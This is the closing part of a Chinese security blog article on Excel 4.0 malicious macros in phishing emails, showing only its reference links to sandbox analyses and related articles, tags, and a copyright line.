https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/

https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/

https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/

https://www.freebuf.com/articles/others-articles/236919.html

Old school: evil Excel 4.0 macros (XLM)

从一个野外 office 样本分析中学习 Excel 4.0 marco

https://www.jianshu.com/p/d2bab95ec62c

恶意宏(2),Excel 4.0(3),安全技术(65),钓鱼邮件(7)

本文原创，作者：张，其版权均为华盟网所有。如需转载，请注明出处：https://www.77169.net/html/262019.html

官方

张

1.49K篇文章 67.66M总阅读量

上一篇：5家医院曾因此被重罚！医院应如何进行信息安全建设？下一篇：靠搬砖就能开跑车住别墅？特大区块链“智能合约”技术犯罪团伙被抓获

分析钓鱼邮件搭载的Excel 4.0恶意宏

相关文章

Vm虚拟机破解win密码

linux系统中etc文件夹下的配置文件

一次验证码安全测试

发表评论取消回复

相关文章

Vm虚拟机破解win密码

linux系统中etc文件夹下的配置文件

一次验证码安全测试

发表评论 取消回复

发表评论取消回复